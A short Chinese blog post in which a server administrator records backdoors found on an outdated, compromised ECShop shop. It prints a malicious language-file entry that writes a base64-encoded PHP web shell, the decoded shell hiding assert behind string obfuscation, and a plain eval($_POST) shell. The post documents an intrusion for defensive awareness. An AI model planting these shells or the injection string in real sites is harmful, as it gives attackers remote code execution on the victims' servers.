有个服务器没怎么管它,发现磁盘莫名奇妙的全满了。上面是一些ECShop商城,很久没更新了。ECShop本来漏洞就比较多,国内用的也多,估计好多人没事都在扫吧。。。
发现一些后门,记录下:
$_LANG['is_paid'] = "状态${${fputs(fopen(base64_decode(aW5kZS5waHA),w),base64_decode(PD9waHAgJGsgPSBzdHJfcmVwbGFjZSgiOSIsIiIsImE5czk5czllOXI5dCIpOyRrKCRfUE9TVFsiOSJdKTsgPz4))}}";
解开后就是
fputs(fopen('inde.php', 'w'),'<?php $k = str_replace("9","","a9s99s9e9r9t");$k($_POST["9"]); ?>');
利用assert函数来执行远程代码。
@eval(($_POST["9"]);
这就太明显了,直接用eval函数执行远程代码。
已经有(0)位网友发表了评论,你也评一评吧!
原创文章如转载,请注明:转载自Eddy Blog
原文地址:http://www.rrgod.com/webdesign/900.html 欢迎订阅Eddy Blog。